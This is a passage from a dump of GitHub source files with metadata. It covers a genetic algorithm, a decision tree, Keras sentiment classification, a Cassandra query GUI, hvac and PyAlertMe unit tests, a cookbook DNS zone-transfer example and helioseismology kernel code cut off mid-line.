range(100):\n t = rank_roulette(df_start, pop) # selection: \"tournament\" or \"rank_roulette\"\n w = crossover(t) # crossover: \"order_crossover\" or \"crossover\"\n m = mutate(w)\n s = save_best(m, df_start)\n if i == 0:\n best_s = s\n elif i > 0:\n if s[1] < best_s[1]:\n best_s = s\n\n pop = m\n print(best_s[1])\n\n","repo_name":"KedraMichal/n-job-m-machine-sequencing-problem","sub_path":"genetic-algorithm.py","file_name":"genetic-algorithm.py","file_ext":"py","file_size_in_byte":7482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32602223554","text":"word = input('Ingrese una palabra: ')\nlongitud = len(word)\nletras = []\nletrasint = []\nfor i in range(longitud):\n letra = word[i]\n letras.append(letra)\nfor i in range(longitud, 0, -1):\n letra = word[i-1]\n letrasint.append(letra)\nif letrasint == letras:\n print(f'Es un 
palindromo')\nelse:\n print(f'No es un palindromo')","repo_name":"Santiagonk/Aprende_con_alf","sub_path":"Listas_y_tuplas/Ejercicio_8.py","file_name":"Ejercicio_8.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19819117685","text":"import pandas as pd\r\nimport numpy as np\r\nimport random\r\n\r\nclass decisiontree():\r\n \r\n def __init__(self, counter, min_samples, max_depth, random_subspace):\r\n self.counter = counter\r\n self.min_samples = min_samples\r\n self.max_depth = max_depth\r\n self.random_subspace = random_subspace\r\n\r\n def determine_type_of_feature(self, df):\r\n \r\n feature_types = []\r\n n_unique_values_treshold = 15\r\n for feature in df.columns:\r\n if feature != \"label\":\r\n unique_values = df[feature].unique()\r\n example_value = unique_values[0]\r\n \r\n if (isinstance(example_value, str)) or (len(unique_values) <= n_unique_values_treshold):\r\n feature_types.append(\"categorical\")\r\n else:\r\n feature_types.append(\"continuous\")\r\n \r\n return feature_types\r\n \r\n def check_purity(self, data):\r\n \r\n label_column = data[:, -1]\r\n unique_classes = np.unique(label_column)\r\n \r\n if len(unique_classes) == 1:\r\n return True\r\n else:\r\n return False\r\n \r\n \r\n # 1.2 Classify\r\n def classify_data(self, data):\r\n \r\n label_column = data[:, -1]\r\n unique_classes, counts_unique_classes = np.unique(label_column, return_counts=True)\r\n \r\n index = counts_unique_classes.argmax()\r\n classification = unique_classes[index]\r\n \r\n return classification\r\n \r\n \r\n # 1.3 Potential splits?\r\n def get_potential_splits(self, data):\r\n \r\n potential_splits = {}\r\n _, n_columns = data.shape\r\n column_indices = list(range(n_columns - 1)) # excluding the last column which is the label\r\n \r\n if self.random_subspace and self.random_subspace <= len(column_indices):\r\n column_indices = random.sample(population=column_indices, k=self.random_subspace)\r\n \r\n for column_index in column_indices: \r\n values = data[:, column_index]\r\n unique_values = np.unique(values)\r\n \r\n potential_splits[column_index] = unique_values\r\n \r\n return potential_splits\r\n \r\n \r\n # 1.4 Lowest Overall Entropy?\r\n def calculate_entropy(self, data):\r\n \r\n label_column = data[:, -1]\r\n _, counts = np.unique(label_column, return_counts=True)\r\n \r\n probabilities = counts / counts.sum()\r\n entropy = sum(probabilities * -np.log2(probabilities))\r\n \r\n return entropy\r\n \r\n \r\n def calculate_overall_entropy(self, data_below, data_above):\r\n \r\n n = len(data_below) + len(data_above)\r\n p_data_below = len(data_below) / n\r\n p_data_above = len(data_above) / n\r\n \r\n overall_entropy = (p_data_below * self.calculate_entropy(data_below) \r\n + p_data_above * self.calculate_entropy(data_above))\r\n \r\n return overall_entropy\r\n \r\n \r\n def determine_best_split(self, data, potential_splits):\r\n \r\n overall_entropy = 9999\r\n for column_index in potential_splits:\r\n for value in potential_splits[column_index]:\r\n data_below, data_above = self.split_data(data, split_column=column_index, split_value=value)\r\n current_overall_entropy = self.calculate_overall_entropy(data_below, data_above)\r\n \r\n if current_overall_entropy <= overall_entropy:\r\n overall_entropy = current_overall_entropy\r\n best_split_column = column_index\r\n best_split_value = value\r\n \r\n return best_split_column, best_split_value\r\n \r\n \r\n # 1.5 Split data\r\n def 
split_data(self, data, split_column, split_value):\r\n \r\n split_column_values = data[:, split_column]\r\n \r\n type_of_feature = FEATURE_TYPES[split_column]\r\n if type_of_feature == \"continuous\":\r\n data_below = data[split_column_values <= split_value]\r\n data_above = data[split_column_values > split_value]\r\n \r\n # feature is categorical \r\n else:\r\n data_below = data[split_column_values == split_value]\r\n data_above = data[split_column_values != split_value]\r\n \r\n return data_below, data_above\r\n \r\n \r\n # 2. Decision Tree Algorithm\r\n def decision_tree_algorithm(self, df):\r\n \r\n # data preparations\r\n if self.counter == 0:\r\n global COLUMN_HEADERS, FEATURE_TYPES\r\n COLUMN_HEADERS = df.columns\r\n FEATURE_TYPES = self.determine_type_of_feature(df)\r\n data = df.values\r\n else:\r\n data = df \r\n \r\n \r\n # base cases\r\n if (self.check_purity(data)) or (len(data) < self.min_samples) or (self.counter == self.max_depth):\r\n classification = self.classify_data(data)\r\n \r\n return classification\r\n \r\n \r\n # recursive part\r\n else: \r\n self.counter += 1\r\n \r\n # helper functions \r\n potential_splits = self.get_potential_splits(data)\r\n split_column, split_value = self.determine_best_split(data, potential_splits)\r\n data_below, data_above = self.split_data(data, split_column, split_value)\r\n \r\n # check for empty data\r\n if len(data_below) == 0 or len(data_above) == 0:\r\n classification = self.classify_data(data)\r\n return classification\r\n \r\n # determine question\r\n feature_name = COLUMN_HEADERS[split_column]\r\n type_of_feature = FEATURE_TYPES[split_column]\r\n if type_of_feature == \"continuous\":\r\n question = \"{} <= {}\".format(feature_name, split_value)\r\n \r\n # feature is categorical\r\n else:\r\n question = \"{} = {}\".format(feature_name, split_value)\r\n \r\n # instantiate sub-tree\r\n sub_tree = {question: []}\r\n \r\n # find answers (recursion)\r\n yes_answer = self.decision_tree_algorithm(data_below)\r\n no_answer = self.decision_tree_algorithm(data_above)\r\n \r\n # If the answers are the same, then there is no point in asking the qestion.\r\n # This could happen when the data is classified even though it is not pure\r\n # yet (self.min_samples or self.max_depth base case).\r\n if yes_answer == no_answer:\r\n sub_tree = yes_answer\r\n else:\r\n sub_tree[question].append(yes_answer)\r\n sub_tree[question].append(no_answer)\r\n \r\n return sub_tree\r\n \r\n \r\n # 3.1 One example\r\n def predict_example(self, example, tree):\r\n \r\n question = list(tree.keys())[0]\r\n feature_name, comparison_operator, value, = question.split(\" \")\r\n \r\n # ask question\r\n if comparison_operator == \"<=\":\r\n if example[feature_name] <= float(value):\r\n answer = tree[question][0]\r\n else:\r\n answer = tree[question][1]\r\n \r\n # feature is categorical\r\n else:\r\n if str(example[feature_name]) == value:\r\n answer = tree[question][0]\r\n else:\r\n answer = tree[question][1]\r\n \r\n # base case\r\n if not isinstance(answer, dict):\r\n return answer\r\n \r\n # recursive part\r\n else:\r\n residual_tree = answer\r\n return self.predict_example(example, residual_tree)\r\n \r\n \r\n def decision_tree_predictions(self, test_df, tree):\r\n predictions = test_df.apply(self.predict_example, args=(tree,), axis=1)\r\n return predictions\r\n 
\r\n","repo_name":"jacobholmshaw/AutoML-project","sub_path":"Models/decision_trees.py","file_name":"decision_trees.py","file_ext":"py","file_size_in_byte":7934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31760869472","text":"import asyncio\nimport datetime\nfrom pathlib import Path\n\nfrom colorama import Fore\n\nfrom crawler_settings import CrawlerSettings\n\ntracked_images = {} # path, detection_time, mod_time\n\n\ndef retrieve_images(search_dirs, ignore_dirs, extensions):\n images = {}\n\n for search_dir in search_dirs:\n for f in Path(search_dir).rglob('*'):\n if not set(f.parents).isdisjoint(ignore_dirs):\n continue\n if f.suffix in extensions:\n try:\n images[f] = f.stat().st_mtime_ns\n except FileNotFoundError as err:\n if f.is_symlink():\n print(Fore.CYAN, f'File {f} is a symlink')\n else:\n print(Fore.CYAN, f'Error while accessing file {f}')\n print(err)\n return images\n\n\nasync def get_fs_changes(added_images, removed_images, changed_images, interval=5):\n print(CrawlerSettings.EXTENSIONS,\n CrawlerSettings.TRACKED_DIRS,\n CrawlerSettings.IGNORED_DIRS)\n while True:\n crawling_start_time = datetime.datetime.now()\n for image_path, mod_time in retrieve_images(CrawlerSettings.TRACKED_DIRS,\n CrawlerSettings.IGNORED_DIRS,\n CrawlerSettings.EXTENSIONS).items():\n if image_path not in tracked_images:\n await added_images.put(item=image_path)\n elif tracked_images[image_path]['mod_time'] != mod_time:\n await changed_images.put(item=image_path)\n\n tracked_images[image_path] = {'detection_time': crawling_start_time,\n 'mod_time': mod_time}\n\n tracked_image_paths = tuple(tracked_images.keys())\n for tracked_image in tracked_image_paths:\n if tracked_images[tracked_image]['detection_time'] != crawling_start_time:\n await removed_images.put(item=tracked_image)\n tracked_images.pop(tracked_image)\n\n print(Fore.RED, 'SLEEP')\n await asyncio.sleep(interval)\n","repo_name":"VitalyRomanov/illusion","sub_path":"crawler/change_detector.py","file_name":"change_detector.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26178379907","text":"#! 
/usr/bin/python\n\"\"\"\ntest_zbhub.py\n\nBy James Saunders, 2017\n\nTests PyAlertMe Module.\n\"\"\"\nimport sys\nsys.path.insert(0, '../')\nfrom pyalertme import *\nimport unittest\nfrom mock_serial import Serial\n\n\nclass TestZBHub(unittest.TestCase):\n \"\"\"\n Test PyAlertMe ZBHub Class.\n \"\"\"\n def setUp(self):\n \"\"\"\n Create a node object for each test.\n \"\"\"\n self.maxDiff = None\n self.hub_ser = Serial()\n self.hub_obj = ZBHub(self.hub_ser)\n self.hub_obj.addr_long = b'\\x00\\x1e\\x5e\\x09\\x02\\x14\\xc5\\xab'\n self.hub_obj.addr_short = b'\\x88\\xd2'\n\n self.device_ser = Serial()\n self.device_obj = ZBDevice(self.device_ser)\n\n def tearDown(self):\n \"\"\"\n Teardown node object.\n \"\"\"\n self.hub_obj.halt()\n self.device_obj.halt()\n\n def test_receive_message(self):\n \"\"\"\n Test Receive Message.\n \"\"\"\n # First, lets manually construct a Version message and send it into the Hub.\n message = {\n 'profile': b'\\xc2\\x16',\n 'source_addr': b'\\x92T',\n 'dest_endpoint': b'\\x02',\n 'rf_data': b'\\t\\x00\\xfeT\\x92\\x1b\\xf7r\\x01\\x00o\\r\\x009\\x10\\x07\\x00\\x01(\\x00\\x01\\x0bAlertMe.com\\tSmartPlug\\n2011-07-25',\n 'source_endpoint': b'\\x02',\n 'options': b'\\x01',\n 'source_addr_long': b'\\x00\\ro\\x00\\x01r\\xf7\\x1b',\n 'cluster': b'\\x00\\xf6',\n 'id': 'rx_explicit'\n }\n self.hub_obj.receive_message(message)\n result = self.hub_obj.list_devices()\n expected = {\n '00:0d:6f:00:01:72:f7:1b': {\n 'manu_string': 'AlertMe.com',\n 'type': 'SmartPlug',\n 'hwMajorVersion': 1,\n 'hwMinorVersion': 0,\n }\n }\n self.assertEqual(result, expected)\n\n # Next, lets get the class to generate a Version message and send it into the Hub.\n params = {\n 'type': 'Generic',\n 'hwMajorVersion': 1,\n 'hwMinorVersion': 0,\n 'manu_string': 'PyAlertMe',\n 'manu_date': '2017-01-01'\n }\n message = self.device_obj.generate_message('version_info_update', params)\n message['id'] = 'rx_explicit'\n message['source_addr'] = b'\\x88\\xfd'\n message['source_addr_long'] = b'\\x00\\x0d\\x6f\\x00\\x00\\x00\\xff\\xff'\n message['rf_data'] = message['data']\n self.hub_obj.receive_message(message)\n result = self.hub_obj.list_devices()\n expected = {\n '00:0d:6f:00:01:72:f7:1b': {\n 'type': 'SmartPlug',\n 'hwMajorVersion': 1,\n 'hwMinorVersion': 0,\n 'manu_string': 'AlertMe.com'\n },\n '00:0d:6f:00:00:00:ff:ff': {\n 'type': 'Generic',\n 'hwMajorVersion': 1,\n 'hwMinorVersion': 0,\n 'manu_string': 'PyAlertMe'\n }\n }\n self.assertEqual(result, expected)\n\n # Test get device\n result = self.hub_obj.get_device('00:0d:6f:00:01:72:f7:1b')\n self.assertTrue(result['type'] == 'SmartPlug')\n self.assertTrue(result['hwMajorVersion'] == 1)\n self.assertTrue(result['hwMinorVersion'] == 0)\n\n def test_mock_serial(self):\n \"\"\"\n Test Mock Serial\n \"\"\"\n # Match Descriptor Request\n message = {\n 'source_addr_long': b'\\x00\\x13\\xa2\\x00@\\xa2;\\t',\n 'source_addr': 'RK',\n 'source_endpoint': b'\\x00',\n 'dest_endpoint': b'\\x00',\n 'profile': b'\\x00\\x00',\n 'cluster': b'\\x00\\x06',\n 'id': 'rx_explicit',\n 'options': b'\\x01',\n 'rf_data': b'\\x01\\xfd\\xff\\x16\\xc2\\x00\\x01\\xf0\\x00'\n }\n self.hub_obj.receive_message(message)\n result = self.hub_ser.get_data_written()\n expected = b'~\\x00\\x17}1\\x00\\x00}3\\xa2\\x00@\\xa2;\\tRK\\x02\\x02\\x00\\xf6\\xc2\\x16\\x00\\x00}1\\x00\\xfc\\x97' \n self.assertEqual(result, expected)\n\nif __name__ == '__main__':\n 
unittest.main(verbosity=2)\n","repo_name":"jamesleesaunders/PyAlertMe","sub_path":"tests/test_zbhub.py","file_name":"test_zbhub.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"7488784457","text":"from tkinter import *\nfrom cassandra.cluster import Cluster\n\n# Connect to Cassandra\ncluster = Cluster(['localhost']) # Change to your Cassandra node's IP address\nsession = cluster.connect('demo') # Change to your keyspace name\n\n# Define a function to execute a query\ndef execute_query(query):\n rows = session.execute(query)\n return rows\n\n# Define a function to display the query result in a listbox\ndef display_result(result):\n listbox.delete(0, END)\n for row in result:\n listbox.insert(END, row)\n\n# Define a function to handle button click event\ndef handle_click():\n query = query_entry.get()\n result = execute_query(query)\n display_result(result)\n\n# Create a window\nwindow = Tk()\nwindow.title('Cassandra GUI')\nwindow.geometry('900x900')\n# Create a label\nlabel = Label(window, text='Enter a CQL query:',font=('Arial', 24))\nlabel.pack()\n\n# Create an entry field\nquery_entry = Entry(window)\nquery_entry.pack()\n\n# Create a button\nbutton = Button(window, text='Execute', command=handle_click)\nbutton.pack()\n\n# Create a listbox to display the query result\nlistbox = Listbox(window)\nlistbox.pack()\n\n# Start the GUI main loop\nwindow.mainloop()\n","repo_name":"prathameshraje23/oooooo","sub_path":"Assignment-10 cassandra/cassy9.py","file_name":"cassy9.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21865537785","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy\n\n# getting the data\nimdb = keras.datasets.imdb\n\n#splitting into training data and testing data\n(train_data, train_labels), (test_data, test_labels) = imdb.load_data(num_words=10000)\n\n# print(train_labels[0])\n\n\n\n_word_index = imdb.get_word_index()\n\n#get key , value pairs.\n#v+3 as for special key value pairs.\n\nword_index = {k:(v+3) for k,v in _word_index.items()}\nword_index[\"\"] = 0\nword_index[\"\"] = 1\nword_index[\"\"] = 2 # unknown\nword_index[\"\"] = 3\n\n#reversing to make integer pointing to the word.\nreverse_word_index = dict([(value, key) for (key, value) in word_index.items()])\n\n\n#Since review length differ, making max len review 250, padding shorter reviews with 0.\ntrain_data = keras.preprocessing.sequence.pad_sequences(train_data, value=word_index[\"\"], padding=\"post\", maxlen=250)\ntest_data = keras.preprocessing.sequence.pad_sequences(test_data, value=word_index[\"\"], padding=\"post\", maxlen=250)\n\n\n\n# ? 
in place of words not found.\n# decode_review to decode it to text.\ndef decode_review(text):\n\treturn \" \".join([reverse_word_index.get(i, \"?\") for i in text])\n\n#see what a review looks like ?\n# print(decode_review(train_data[0]))\n\n#defining model\n\n#embedding layer maps similar words closer 88000 word vectors and 16 dimensions\n#globalaveragepooling1d basically kind of reduces the dimensions.\n# embedding(many dimensions) -> average(few dimensions) -> dense layer(relu) -> dense layer(sigmoid)\n\nmodel = keras.Sequential()\nmodel.add(keras.layers.Embedding(88000, 16))\nmodel.add(keras.layers.GlobalAveragePooling1D())\nmodel.add(keras.layers.Dense(16, activation=\"relu\"))\nmodel.add(keras.layers.Dense(1, activation=\"sigmoid\"))\n\nmodel.summary() # prints a summary of the model\n\n\nmodel.compile(optimizer=\"adam\", loss=\"binary_crossentropy\", metrics=[\"accuracy\"])\n\n#about 25000 entry in train data.\n#splitting train data into train and validation data\nx_val = train_data[:10000]\nx_train = train_data[10000:]\n\ny_val = train_labels[:10000]\ny_train = train_labels[10000:]\n\n#batch size is how many movie reviews loading in at once.\nfitted_Model = model.fit(x_train,y_train, epochs=40, batch_size=512, validation_data=(x_val,y_val), verbose=1)\nresults = model.evaluate(test_data,test_labels)\nprint(results)\n\nmodel.save(\"model.h5\")\n\n# test_review = test_data[0]\n# predict = model.predict([test_review])\n# print(\"Review : \")\n# print(decode_review(test_review))\n# print(\"Prediction : \"+str(predict[0]))\n# print(\"Actual : \"+str(test_labels[0]))\n","repo_name":"sarveshbhatnagar/text_classification","sub_path":"basic_classify.py","file_name":"basic_classify.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38614475865","text":"#https://leetcode-cn.com/problems/reverse-bits/\n\nclass Solution:\n def reverseBits(self, n: int) -> int:\n ret, power = 0, 31\n while n:\n ret += (n & 1) << power#最低位与1,然后左移power位,低位补0\n n = n >> 1#向右移动1位,高位补0\n power -= 1#power自减\n return ret\n\nif __name__ == '__main__':\n S = Solution()\n result = S.reverseBits(43261596)\n print(result)","repo_name":"francs1/leetcode_basic_60","sub_path":"leetcode入门60题/04位运算/leetcode190_颠倒二进制位.py","file_name":"leetcode190_颠倒二进制位.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14758081661","text":"import logging\nimport requests_mock\nfrom unittest import TestCase\n\nfrom hvac.api.secrets_engines.database import Database\nfrom hvac.api.secrets_engines.database import DEFAULT_MOUNT_POINT\nfrom hvac.adapters import JSONAdapter\n\n\nclass TestDatabase(TestCase):\n def setUp(self):\n self.database = Database(adapter=JSONAdapter())\n self.expected_status_code = 200\n\n def mock_request(self, method, mock_url, mock_response):\n with requests_mock.mock() as requests_mocker:\n requests_mocker.register_uri(\n method=method,\n url=mock_url,\n status_code=self.expected_status_code,\n json=mock_response,\n )\n return requests_mocker\n\n def test_configure(self):\n name = \"test_db\"\n plugin_name = \"test_plugin\"\n verify_connection = None\n allowed_roles = None\n root_rotation_statements = None\n mount_point = DEFAULT_MOUNT_POINT\n\n mock_url = f\"http://localhost:8200/v1/{mount_point}/config/{name}\"\n mock_response = {\"status_code\": 204} # no response other than status code\n expected_status_code = 
204\n\n with self.mock_request(\"POST\", mock_url, mock_response):\n configure_response = self.database.configure(\n name=name,\n plugin_name=plugin_name,\n verify_connection=verify_connection,\n allowed_roles=allowed_roles,\n root_rotation_statements=root_rotation_statements,\n mount_point=mount_point,\n )\n logging.debug(\"configure_response: %s\" % configure_response)\n\n self.assertEqual(configure_response[\"status_code\"], expected_status_code)\n\n def test_rotate_root_credentials(self):\n name = \"test_db\"\n mount_point = DEFAULT_MOUNT_POINT\n\n mock_url = f\"http://localhost:8200/v1/{mount_point}/rotate-root/{name}\"\n mock_response = {\"status_code\": 204} # no response other than status code\n expected_status_code = 204\n\n with self.mock_request(\"POST\", mock_url, mock_response):\n rotate_root_credentials_response = self.database.rotate_root_credentials(\n name=name, mount_point=mount_point\n )\n logging.debug(\n \"rotate_root_credentials_response: %s\" % rotate_root_credentials_response\n )\n self.assertEqual(\n rotate_root_credentials_response[\"status_code\"], expected_status_code\n )\n\n def test_rotate_static_role_credentials(self):\n name = \"test_role\"\n mount_point = DEFAULT_MOUNT_POINT\n\n mock_url = f\"http://localhost:8200/v1/{mount_point}/rotate-role/{name}\"\n mock_response = {\n \"data\": {\"last_vault_rotation\": \"2023-09-25T19:02:38.347994635Z\"}\n }\n\n with self.mock_request(\"POST\", mock_url, mock_response):\n rotate_static_credentials_response = (\n self.database.rotate_static_role_credentials(\n name=name, mount_point=mount_point\n )\n )\n logging.debug(\n \"rotate_static_credentials_response: %s\"\n % rotate_static_credentials_response\n )\n self.assertEqual(rotate_static_credentials_response, mock_response)\n","repo_name":"hvac/hvac","sub_path":"tests/unit_tests/api/secrets_engines/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":1152,"dataset":"github-code","pt":"72"} +{"seq_id":"23658506264","text":"#!/usr/bin/env python\n# Python Network Programming Cookbook, Second Edition -- Chapter - 11\n# This program is optimized for Python 2.7.12 and Python 3.5.2.\n# It may run on any other version with/without modifications.\n\nimport argparse\nimport dns.zone\nimport dns.resolver\nimport socket\n\ndef main(address):\n soa_answer = dns.resolver.query(address, 'SOA')\n master_answer = dns.resolver.query(soa_answer[0].mname, 'A')\n try:\n z = dns.zone.from_xfr(dns.query.xfr(master_answer[0].address, address))\n names = z.nodes.keys()\n names.sort()\n for n in names:\n print(z[n].to_text(n))\n except socket.error as e:\n print('Failed to perform zone transfer:', e)\n except dns.exception.FormError as e:\n print('Failed to perform zone transfer:', e)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='DNS Python')\n parser.add_argument('--address', action=\"store\", dest=\"address\", default='dnspython.org')\n given_args = parser.parse_args() \n address = given_args.address\n main (address)\n\n","repo_name":"PacktPublishing/Python-Network-Programming-Cookbook-Second-Edition","sub_path":"Chapter11/11_4_dns_zone_transfer.py","file_name":"11_4_dns_zone_transfer.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"72"} +{"seq_id":"30904518824","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport functions as fn\nfrom os import 
getcwd\nimport timing\nclock1 = timing.stopclock()\ntstamp = clock1.lap\n\n\nclass Hkernels:\n \"\"\"This class handles l parameters of the kernel\"\"\"\n #setting up shorthand repeatedly used in kernel evaluation\n\n def __init__(self,n_,l_,m_,n,l,m,s,r_start,r_end):\n self.n = n\n self.l = l\n self.n_ = n_\n self.l_ = l_\n r_full = np.loadtxt('r.dat')\n self.r = r_full[r_start:r_end]\n #ss is m X m X s dim (outer)\n self.mm_, self.mm, self.ss_o = np.meshgrid(m_,m,s, indexing = 'ij')\n #ss_in is s X r dim (inner)\n self.ss_i,__ = np.meshgrid(s,self.r, indexing = 'ij')\n self.r_range = r_start,r_end\n\n def wig_red_o(self,m1,m2,m3):\n '''3j symbol with upper row fixed (outer)'''\n wig_vect = np.vectorize(fn.wig)\n return wig_vect(self.l_,self.ss_o,self.l,m1,m2,m3)\n\n def wig_red(self,m1,m2,m3):\n '''3j symbol with upper row fixed (inner)'''\n wig_vect = np.vectorize(fn.wig)\n return wig_vect(self.l_,self.ss_i,self.l,m1,m2,m3)\n\n def ret_kerns(self):\n n,l,m,n_,l_,m_ = self.n, self.l, self.mm, self.n_, self.l_, self.mm_\n r_start , r_end = self.r_range\n nl = fn.find_nl(n,l)\n nl_ = fn.find_nl(n_,l_)\n\n len_m, len_m_, len_s = np.shape(self.ss_o)\n\n #Savitsky golay filter for smoothening\n window = 45 #must be odd\n order = 3\n\n if(nl == None or nl_ == None):\n print(\"Mode not found. Exiting.\"); exit()\n\n #loading required functions\n eig_dir = (getcwd() + '/eig_files')\n Ui,Vi = fn.load_eig(n,l,eig_dir)\n Ui_,Vi_= fn.load_eig(n_,l_,eig_dir)\n rho = np.loadtxt('rho.dat')\n\n #slicing the radial function acoording to radial grids\n r = self.r\n rho = rho[r_start:r_end]\n Ui = Ui[r_start:r_end]\n Vi = Vi[r_start:r_end]\n Ui_ = Ui_[r_start:r_end]\n Vi_ = Vi_[r_start:r_end]\n\n tstamp()\n om = np.vectorize(fn.omega)\n parity_fac = (-1)**(l+l_+self.ss_o) #parity of selected modes\n prefac = 1./(4.* np.pi) * np.sqrt((2*l_+1.) * (2*self.ss_o+1.) * (2*l+1.) 
\\\n / (4.* np.pi)) * self.wig_red_o(-m_,m_-m,m)\n tstamp('prefac computation')\n\n #EIGENFUCNTION DERIVATIVES\n\n #smoothing\n\n #interpolation params\n #npts = 30000\n #r_new = np.linspace(np.amin(r),np.amax(r),npts)\n\n\n #Ui,dUi,d2Ui = fn.smooth(U,r,window,order,npts)\n #Vi,dVi,d2Vi = fn.smooth(V,r,window,order,npts)\n\n #Ui_,dUi_,d2Ui_ = fn.smooth(U_,r,window,order,npts)\n #Vi_,dVi_,d2Vi_ = fn.smooth(V_,r,window,order,npts)\n\n #rho_sm, __, __ = fn.smooth(rho,r,window,order,npts)\n ##re-assigning with smoothened variables\n #r = r_new\n #rho = rho_sm\n\n ##no smoothing\n dUi, dVi = np.gradient(Ui,r), np.gradient(Vi,r)\n dUi_, dVi_ = np.gradient(Ui_,r), np.gradient(Vi_,r)\n d2Ui_,d2Vi_ = np.gradient(dUi_,r), np.gradient(dVi_,r)\n tstamp('load eigfiles')\n\n #making U,U_,V,V_,dU,dU_,dV,dV_,d2U,d2U_,d2V,d2V_ of same shape\n\n U = np.tile(Ui,(len_s,1))\n V = np.tile(Vi,(len_s,1))\n dU = np.tile(dUi,(len_s,1))\n dV = np.tile(dVi,(len_s,1))\n U_ = np.tile(Ui_,(len_s,1))\n V_ = np.tile(Vi_,(len_s,1))\n dU_ = np.tile(dUi_,(len_s,1))\n dV_ = np.tile(dVi_,(len_s,1))\n d2U_ = np.tile(d2Ui_,(len_s,1))\n d2V_ = np.tile(d2Vi_,(len_s,1))\n r = np.tile(r,(len_s,1))\n\n tstamp()\n\n #B-- EXPRESSION\n Bmm = -r*(self.wig_red(0,-2,2)*om(l,0)*om(l,2)*V*dU_ + self.wig_red(2,-2,0)*om(l_,0)* \\\n om(l_,2)*V_*dU)\n Bmm += self.wig_red(1,-2,1)*om(l_,0)*om(l,0)*(U-V)*(U_ - V_ + r*dV_)\n Bmm = (((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (Bmm/r**2)[np.newaxis,:,:]\n #B-- EXTRA\n Bmm_ = om(l_,0)*(self.wig_red(2,-2,0)*om(l_,2)*U*(V_ - r*dV_) + om(l,0)*V \\\n *(self.wig_red(3,-2,-1)*om(l_,2)*om(l_,3)*V_ + self.wig_red(1,-2,1) \\\n *(-U_ + V_ + om(l_,2)**2 *V_ - r*dV_)))\n Bmm_ = (((-1)**np.abs(1+m_))*prefac)[:,:,:,np.newaxis] \\\n * (Bmm_/r**2)[np.newaxis,:,:]\n\n# tstamp('Bmm done')\n\n #B0- EXPRESSION\n B0m = self.wig_red(1,-1,0)*om(l_,0)*(U - (om(l,0)**2)*V)*(U_ - V_ + r*dV_)\n B0m += om(l,0)*(om(l_,0)*(self.wig_red(-1,-1,2)*om(l,2)*V*(U_ - V_ + r*dV_) \\\n + 2*r*self.wig_red(2,-1,-1)*om(l_,2)*V_*dV) + self.wig_red(0,-1,1) \\\n *((U-V)*(2*U_ - 2*(om(l_,0)**2)*V_ - r*dU_) + r**2 * dU_*dV))\n\n B0m = (0.5*((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (B0m/r**2)[np.newaxis,:,:]\n \n #B0- EXTRA\n B0m_ = om(l,0)*V*(self.wig_red(2,-1,-1)*om(l_,0)*om(l_,2)*(U_ - 3*V_ + r*dV_) \\\n + self.wig_red(0,-1,1)*((2+om(l_,0)**2)*U_ - 2*r*dU_ + om(l_,0)**2 \\\n *(-3*V_ + r*dV_)))\n B0m_ += self.wig_red(1,-1,0)*om(l_,0)*U*(U_ - V_ - r*(dU_ - dV_ + r*d2V_))\n B0m_ = (0.5*((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (B0m_/r**2)[np.newaxis,:,:]\n# tstamp('B0m done')\n\n #B00 OLD\n B00 = -self.wig_red(0,0,0)*(2*U_ - 2*om(l_,0)**2 * V_ - r*dU_)*(-2*U + 2*om(l,0)**2 *V + \\\n r*dU)\n B00 -= 2*r*(self.wig_red(-1,0,1) + self.wig_red(1,0,-1))*om(l_,0)*om(l,0) \\\n *(U_ - V_ + r*dV_)*dV\n\n # B00 = np.tile(B00,(len_m,len_m_,1,1))\n\n B00 = (0.5*((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (B00/r**2)[np.newaxis,:,:]\n #B00 EXTRA\n B00_ = -(self.wig_red(-1,0,1) + self.wig_red(1,0,-1)) * om(l_,0)*om(l,0) * V*(-4*U_+2*(1+om(l_,0)**2)*V_+r*(dU_-2*dV_))\n B00_ += self.wig_red(0,0,0)*U*(2*U_-2*r*dU_-2*om(l_,0)**2 *(V_-r*dV_)+r*r*d2U_)\n\n #B00_ = np.tile(B00_,(len_m,len_m_,1,1))\n\n B00_ = (0.5*((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (B00_/r**2)[np.newaxis,:,:]\n\n# tstamp('B00 done')\n\n #B+- OLD\n Bpm = -r**2 * self.wig_red(0,0,0)*dU_*dU \n Bpm += om(l_,0)*om(l,0)*(-2*(self.wig_red(-2,0,2)+self.wig_red(2,0,-2))*om(l_,2)*om(l,2)*V_*V \\\n + self.wig_red(-1,0,1)*(U-V)*(U_ - V_ + r*dV_) + 
